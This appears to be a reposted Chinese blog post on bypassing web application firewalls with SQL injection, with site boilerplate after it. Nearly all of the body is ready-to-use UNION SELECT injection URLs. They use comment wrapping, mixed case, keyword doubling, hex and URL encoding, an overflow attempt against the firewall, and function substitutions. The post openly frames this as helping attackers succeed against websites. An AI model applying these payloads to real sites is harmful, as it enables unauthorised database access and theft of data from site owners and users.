黑客技巧:SQL注入绕过WAF

摘要

用小小的注释符,绕过安全的防护墙。攻击者得逞,网站却狼狈不堪。

正文

【摘要】基本/简单绕过方法:1、注释符http://www.site.com/index.php?page_id=-15/*!UNION*//*!SELECT*/1,2,3,4….2、使用大小写http://www.site.com/index.php?page_id=-1… 基本/简单绕过方法:1、注释符http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….2、使用大小写http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….3、结合前面两种方法http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….4、关键字替换http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….5、内部注释http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…U替换为%55,S替换为%53 在 union 和 select 之间添加注释/**/高级绕过方法:1、缓冲区溢出/使防火墙崩溃大部分防火墙都是基于C/C++开发的,我们可以使用缓冲区溢出使用WAF崩溃http://www.site.com/index.php?page_id=-15+and+(select1)=(Select 0xAA[..(add about 1000 “A”)..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….你可以使用如下方法测试WAF?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….如果返回500错误,你就可以使用缓冲区溢出的方法来绕过WAF2、对字母进行编码http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….3、使用其他变量或者命令对注入语句进行替换COMMAND | WHAT TO USE INSTEAD@@version | version()concat() | concat_ws()group_concat() | concat_ws()4、利用WAF本身的功能绕过假如你发现WAF会把”*”替换为空,那么你就可以利用这一特性来进行绕过‍‍‍‍‍‍‍‍http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4….

其它方法:-15+(uNioN)+(sElECt)….-15+(uNioN+SeleCT)+…-15+(UnI)(oN)+(SeL)(ecT)+….-15+union (select 1,2,3,4…)

–转载请注明本文地址!

关注不迷路

扫码下方二维码,关注宇凡盒子公众号,免费获取最新技术内幕!

温馨提示:如果您访问和下载本站资源,表示您已同意只将下载文件用于研究、学习而非其他用途。
文章版权声明 1、本网站名称:宇凡盒子
2、本站文章未经许可,禁止转载!
3、如果文章内容介绍中无特别注明,本网站压缩包解压需要密码统一是:yufanbox.com
4、本站仅供资源信息交流学习,不保证资源的可用及完整性,不提供安装使用及技术服务。点此了解
5、如果您发现本站分享的资源侵犯了您的权益,请及时通知我们,我们会在接到通知后及时处理!提交入口
0

评论0

请先

站点公告

🚀 【宇凡盒子】全网资源库转储中心

👉 注册即送VIP权限👈

👻 全站资源免费下载✅,欢迎注册!

记得 【收藏】+【关注】 谢谢!~~~

立即注册
没有账号?注册  忘记密码?

社交账号快速登录